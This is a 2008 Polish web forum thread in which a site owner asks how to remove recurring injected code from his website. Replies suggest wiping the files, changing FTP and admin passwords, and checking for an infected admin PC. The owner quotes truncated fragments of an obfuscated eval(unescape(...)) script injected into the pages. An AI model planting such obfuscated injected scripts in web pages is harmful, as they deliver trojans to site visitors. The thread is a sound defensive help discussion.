bartek_fm
19.02.2008, 19:29:08
Witam
Mam pytanie dotyczące wirusów, które zagnieździły się na stronie internetowej. Jak można się ich pozbyć? Czy są jakieś programy do wyszukiwania i kasowania wirusów na stronie? Czy rozwiązaniem problemu byłoby skasowanie i wgranie wszystkich plików na stronę jeszcze raz?
Z góry dziękuję za pomoc!
Bartek
nowotny
19.02.2008, 20:18:21
Same wirusy na tą stronę nie wlazły i się nie zagnieździły... to nie Animal Planet... :/ z resztą samo pojęcie jest jakieś koślawe... wirusy na stronie...? czyli co konkretnie...? link...?
Jabol
19.02.2008, 20:30:47
zbombarduj stronę bombami z napalmem! na pewno się nie ostaną.
Jarod
19.02.2008, 20:40:41
Cytat(bartek_fm @ 19.02.2008, 19:29:08 )

Czy rozwiązaniem problemu byłoby skasowanie i wgranie wszystkich plików na stronę jeszcze raz?
Tak. A swoją drogą to jaki program antywirusowy wykrył te wirusy i co to za wirusy?
bartek_fm
19.02.2008, 20:43:34
Co jakiś czas na stronie tworzy się dodatkowy kod - długi ciąg pewnych znaków - jak rozumiem odsyłacz do wirusów. Dotyczy to napewno katalogu głównego i kilku innych, np. forum. To siłą rzeczy trochę wpływa na kształ wizualny strony, ale przede wszystkim pojawia się informacja, że program wykrył trojana :/
Nadpisuję te pliki, ale co kilka dni dzieje się to samo. Zmieniłem hasło do konta na serwerze, ale nie pomogło :/
Jarod
19.02.2008, 21:01:51
Może korzystasz z jakiś gotowych systemów, które są dziurawe..
Sprawdzałeś gdzie te linki prowadzą? Do plików na innym serwerze?
bartek_fm
19.02.2008, 21:24:02
Trudno powiedzieć. To nie jest typowy kod html.
To jest początek "zbędnego" kodu":
Kod
<!-- [ abecf60df2c3f74043a0b86e23061d7b ] --><script>eval(unescape('function%20peFkDD%28hDIBu
itd...
I koniec:
Kod
2517%251e%2528%2509%251e%251e%253b%256c%256a%257e%27%29%3B'));</script><!-- end -->
nowotny
19.02.2008, 21:26:32
Za to jest to (niecałkiem) typowy kod javascript... dziurawą masz stronę że coś takiego ci działa...
bartek_fm
19.02.2008, 21:34:24
Może to być np. system newsów bez modułu antyspamowego CAPTCHA?
l0ud
19.02.2008, 21:43:22
- usunąć wszystkie pliki z serwera
- zmienić wszystkie hasła, do ftp, mysql, admina etc.
- wgrać wszystkie pliki od początku, jeżeli używasz np. phpbb jako forum, to wgraj najnowszą wersję
W większości przypadków to pomaga. Proponuję na przyszłość bardziej uważać z hasłami...
jono
19.02.2008, 21:47:46
Ale może być też inna sprawa. Jeżeli masz łącze internetowe np. przez EDGE (komórka) to operator kompresuje pliki html. Jak to robi? Ja byłem w szoku, ale w moich własnych stronach operator podczas przesyłania WPISAŁ zewnętrzny plik .css i wszystkie pliki .js do sekcji HEAD... więc możliwe, że są to Twoje własne pliki .js wpisane przez automat do treści strony..
bartek_fm
19.02.2008, 23:10:01
A to ciekawe akurat jest, ponieważ ten kod pojawia się w katalogach z jakimś systemem logowania: system newsów i forum. Chociaż również w katalogu głównym.
LonelyKnight
19.02.2008, 23:29:55
...a gdzie masz hosting? Jaka firma?
bartek_fm
19.02.2008, 23:44:22
Home.pl
Na komputerze też miałem wirusy, więc może przeszły z komputera na serwer
LonelyKnight
20.02.2008, 01:27:49
bartek_fm
20.02.2008, 21:47:05
O widzisz. Rozwiązałeś ten problem? Jeśli tak, to w jaki sposób?
l0ud
20.02.2008, 21:53:23
Jakoś wątpię, żeby home.pl pozwalało sobie na modyfikację prywatnych plików. Dla mnie to jest włamanie - a najlepiej sobie z tym poradzić wykonując kroki, które napisałem wyżej.
Dla pewności, najlepiej by było, gdybyś umieścił gdzieś cały kod, który jest dopisywany do strony, a nie tylko fragment
bartek_fm
20.02.2008, 21:56:27
No własnie. Trudno powiedzieć, żeby to była wina usługodawcy.
LonelyKnight
20.02.2008, 22:23:57
Cytat(bartek_fm @ 20.02.2008, 21:47:05 )

O widzisz. Rozwiązałeś ten problem? Jeśli tak, to w jaki sposób?
A w taki, że wywaliłem ten kod i pozmieniałem ludziom hasła.
Btw. Strony, o których pisałem w tym drugim temacie używały, jeśli dobrze pamiętam, FCKeditor. Poza tym zero, powszechnie dostępnego kodu.
bartek_fm
16.03.2008, 10:48:19
Skasowałem wszystko z serwera. Pozmieniałem większość głównych haseł do konta i skryptów i po jakimś czasie znowi pojawiło się to samo :/
l0ud
16.03.2008, 10:55:21
W takim razie albo jest dziura (co raczej jest mało prawdopodobne przy popularniejszych skryptach), albo Ty lub inny admin macie zawirusowany czymś komputer i przesyła hasła gdzie indziej. Może używacie jakiejś pirackiej wersji total commandera? [oczywiście niczego nie sugeruję]
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę
kliknij tutaj.